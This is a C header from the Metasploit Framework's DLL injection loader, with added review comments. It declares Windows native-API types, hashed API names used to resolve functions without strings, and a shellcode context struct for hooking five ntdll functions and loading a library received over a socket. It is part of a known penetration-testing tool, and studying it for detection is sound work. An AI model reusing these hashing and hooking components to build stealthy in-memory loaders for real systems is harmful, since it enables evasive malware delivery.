GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/dllinject/libloader.h
/*
 * libloader.h -- misc. defines for libloader
 * Jarkko Turkulainen <jt[at]klake.org>
 *
 */
#include <stdio.h>
#include <windows.h>
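/*
 * NTSTATUS values.
 *
 * STATUS_IMAGE_NOT_AT_BASE is an informational code (top bit clear), so the
 * NT_SUCCESS() macro in this header treats it as success.
 */
#define STATUS_SUCCESS 0x00000000
#define STATUS_IMAGE_NOT_AT_BASE 0x40000003

/*
 * Time values.
 *
 * NOTE(review): the names suggest the high 32 bits and two alternative low
 * 32 bits of a 64-bit timestamp (the FILE_BASIC_INFORMATION time fields in
 * this header are LARGE_INTEGER). Where they are consumed is not visible
 * here -- confirm against the loader source.
 */
#define HIGH_TIME 0x01C422FA
#define LOW_TIME_1 0x7E275CE0
#define LOW_TIME_2 0x8E275CE0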
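/*
 * Native-API types copied from the DDK so the loader can be built without
 * the driver headers.
 */

/*
 * File timestamps and attribute flags. In this header it is the output
 * buffer type of f_NtQueryAttributesFile.
 */
typedef struct _FILE_BASIC_INFORMATION {
    LARGE_INTEGER CreationTime;
    LARGE_INTEGER LastAccessTime;
    LARGE_INTEGER LastWriteTime;
    LARGE_INTEGER ChangeTime;
    ULONG FileAttributes;
} FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION;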
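/*
 * Selector for section-object queries. The enumerators carry no explicit
 * values, so they are 0 and 1 in declaration order. No prototype in this
 * header takes this type.
 */
typedef enum _SECTION_INFORMATION_CLASS {
    SectionBasicInformation,
    SectionImageInformation
} SECTION_INFORMATION_CLASS;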
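/* 64-bit physical address, carried as a LARGE_INTEGER. */
typedef LARGE_INTEGER PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS;

/*
 * Native API status code. Signed on purpose: NT_SUCCESS() relies on the
 * sign bit, so success and informational codes (>= 0) pass while warning
 * and error codes (top bit set) fail.
 */
typedef LONG NTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)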
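/*
 * Completion status block filled in by native I/O calls; in this header it
 * is passed to f_NtOpenFile.
 *
 * NOTE(review): the SDK definition declares Information as ULONG_PTR and
 * overlays Status with a pointer in a union. This two-ULONG-sized form only
 * has the same layout on 32-bit builds.
 */
typedef struct _IO_STATUS_BLOCK {
    NTSTATUS Status;
    ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;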
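/*
 * Counted UTF-16 string used by the native API. The MIDL annotations divide
 * Length and MaximumLength by 2, i.e. both are byte counts rather than
 * character counts; Buffer is not required to be NUL-terminated.
 */
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
#ifdef MIDL_PASS
    [size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer;
#else
    PWSTR Buffer;
#endif
} UNICODE_STRING;
typedef UNICODE_STRING *PUNICODE_STRING;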
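/*
 * Counted narrow-character string.
 *
 * NOTE(review): Buffer is declared PWSTR here, whereas the SDK's ANSI_STRING
 * uses a narrow character pointer (PCHAR). The layout is the same, but code
 * that dereferences Buffer through this type reads 16-bit units. The
 * declaration is left as the author wrote it because the users of this type
 * are not visible in this header.
 */
typedef struct _ANSI_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} ANSI_STRING, *PANSI_STRING, STRING, *PSTRING;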
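/*
 * Inheritance disposition argument of f_NtMapViewOfSection. The explicit
 * values start at 1, not 0.
 */
typedef enum _SECTION_INHERIT {
    ViewShare = 1,
    ViewUnmap = 2
} SECTION_INHERIT;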
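/*
 * Describes the object a native call should open: ObjectName is resolved
 * relative to RootDirectory. In this header it is an argument of the
 * NtOpenSection, NtQueryAttributesFile, NtOpenFile and NtCreateSection
 * prototypes, which makes ObjectName the field that identifies what a
 * caller asked for.
 */
typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;                   /* presumably sizeof(OBJECT_ATTRIBUTES), per the native API convention */
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES;
typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;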
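/*
 * Function pointer types.
 *
 * One typedef per API that SHELLCODE_CTX stores a pointer to. Several of
 * them differ from the SDK prototypes; the differences are noted but the
 * declarations are left as written, since their call sites are not visible
 * in this header.
 */

/* kernel32 */
typedef VOID (WINAPI *f_ExitProcess)(UINT);
/*
 * NOTE(review): returns DWORD where the SDK returns HMODULE, and takes
 * LPCTSTR although the matching hash is named HASH_LoadLibraryA. Only
 * consistent for a 32-bit, non-UNICODE build.
 */
typedef DWORD (WINAPI *f_LoadLibrary)(LPCTSTR);
/* NOTE(review): GetProcAddress takes a narrow LPCSTR name in the SDK. */
typedef FARPROC (WINAPI *f_GetProcAddress)(HMODULE, LPCTSTR);
typedef LPVOID (WINAPI *f_VirtualAlloc)(LPVOID, SIZE_T, DWORD, DWORD);
typedef BOOL (WINAPI *f_VirtualFree)(LPVOID, SIZE_T, DWORD);
/* NOTE(review): the SDK return type is SIZE_T; DWORD matches on 32-bit only. */
typedef DWORD (WINAPI *f_VirtualQuery)(LPCVOID, PMEMORY_BASIC_INFORMATION, SIZE_T);
typedef BOOL (WINAPI *f_VirtualProtect)(LPVOID, SIZE_T, DWORD, PDWORD);
typedef BOOL (WINAPI *f_FlushInstructionCache)(HANDLE, LPCVOID, SIZE_T);
typedef BOOL (WINAPI *f_WriteProcessMemory)(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T *);

/* ntdll */
typedef NTSTATUS (NTAPI *f_NtOpenSection)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES);
typedef NTSTATUS (NTAPI *f_NtQueryAttributesFile)(POBJECT_ATTRIBUTES, PFILE_BASIC_INFORMATION);
/*
 * NOTE(review): declared as returning void, unlike the other ntdll
 * prototypes here; NtOpenFile returns an NTSTATUS, which a call through
 * this type discards.
 */
typedef void (NTAPI *f_NtOpenFile)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES,
    PIO_STATUS_BLOCK, ULONG ShareAccess, ULONG);
typedef NTSTATUS (NTAPI *f_NtCreateSection)(PHANDLE, ULONG, POBJECT_ATTRIBUTES, PLARGE_INTEGER,
    ULONG, ULONG, HANDLE);
/*
 * NOTE(review): the size-like arguments are ULONG / PULONG here; the SDK
 * uses pointer-sized types for them, so this matches on 32-bit only.
 */
typedef NTSTATUS (NTAPI *f_NtMapViewOfSection)(HANDLE, HANDLE, PVOID *, ULONG, ULONG,
    PLARGE_INTEGER, PULONG, SECTION_INHERIT, ULONG, ULONG);

/* ws2_32 */
typedef int (WINAPI *f_recv)(SOCKET, char *, int, int);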
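/*
 * Function hashes.
 *
 * 32-bit constants standing in for exported function names, so the names
 * themselves need not appear as strings. The routine that computes and
 * matches them is not in this header.
 *
 * NOTE(review): the values appear to be the widely published
 * rotate-right-13 API-name hashes. If so, they are stable constants that
 * static signatures and memory scans can match on -- confirm against the
 * resolver in the loader source.
 */

/* kernel32 */
#define HASH_LoadLibraryA 0xec0e4e8e
#define HASH_GetProcAddress 0x7c0dfcaa
#define HASH_ExitProcess 0x73e2d87e
#define HASH_VirtualAlloc 0x91afca54
#define HASH_VirtualFree 0x030633ac
#define HASH_VirtualQuery 0xa3c8c8aa
#define HASH_VirtualProtect 0x7946c61b
#define HASH_FlushInstructionCache 0x53120980
#define HASH_WriteProcessMemory 0xd83d6aa1

/* ntdll */
#define HASH_NtOpenSection 0x92b5dd95
#define HASH_NtQueryAttributesFile 0x494a7890
#define HASH_NtOpenFile 0x852974b8
#define HASH_NtCreateSection 0x5bb29bcb
#define HASH_NtMapViewOfSection 0xd5159b94

/* ws2_32 */
#define HASH_recv 0xe71819b6
/* No function pointer type or SHELLCODE_CTX member for getpeername exists in this header. */
#define HASH_getpeername 0x95066ef2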
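/*
 * Per-run state of the loader: the socket, the library name, addresses of
 * the memory it allocated, the hook bookkeeping for five ntdll functions,
 * and the resolved API pointers.
 *
 * All addresses are held as DWORD, so the structure as written only fits a
 * 32-bit address space.
 *
 * For defenders: the s_* and DWORD members name the ntdll entry points this
 * loader keeps hook state for (NtOpenSection, NtQueryAttributesFile,
 * NtOpenFile, NtCreateSection, NtMapViewOfSection). Entry bytes of those
 * functions that differ from the on-disk ntdll image in a running process
 * are therefore the artefact to check for. NOTE(review): how the stubs are
 * installed is not shown in this header.
 *
 * NOTE(review): member order and sizes may be relied on by code outside
 * this header; do not reorder without checking.
 */
typedef struct _SHELLCODE_CTX {

    /* File descriptor */
    SOCKET sd;
    /* Library name; liblen is presumably its length -- confirm against the code that fills it */
    char libname[256];
    int liblen;
    /* Global offset */
    DWORD offset;
    /* Allocated memory sections */
    DWORD file_address;
    DWORD mapped_address;

    /* Hook stub functions: 10 bytes of storage per hooked function */
    unsigned char s_NtOpenSection[10];
    unsigned char s_NtQueryAttributesFile[10];
    unsigned char s_NtOpenFile[10];
    unsigned char s_NtCreateSection[10];
    unsigned char s_NtMapViewOfSection[10];
    /* Hooked functions: addresses stored as 32-bit values */
    DWORD NtOpenSection;
    DWORD NtQueryAttributesFile;
    DWORD NtOpenFile;
    DWORD NtCreateSection;
    DWORD NtMapViewOfSection;

    /*
     * function pointers, kernel32
     * NOTE(review): windows.h defines LoadLibrary as a macro, so that member
     * is really named LoadLibraryA or LoadLibraryW depending on UNICODE.
     */
    f_LoadLibrary LoadLibrary;
    f_GetProcAddress GetProcAddress;
    f_ExitProcess ExitProcess;
    f_VirtualAlloc VirtualAlloc;
    f_VirtualFree VirtualFree;
    f_VirtualQuery VirtualQuery;
    f_VirtualProtect VirtualProtect;
    f_FlushInstructionCache FlushInstructionCache;
    f_WriteProcessMemory WriteProcessMemory;
    /* function pointers, ntdll */
    f_NtOpenSection p_NtOpenSection;
    f_NtQueryAttributesFile p_NtQueryAttributesFile;
    f_NtOpenFile p_NtOpenFile;
    f_NtCreateSection p_NtCreateSection;
    f_NtMapViewOfSection p_NtMapViewOfSection;
    /* function pointers, ws2_32 */
    f_recv recv;

} SHELLCODE_CTX;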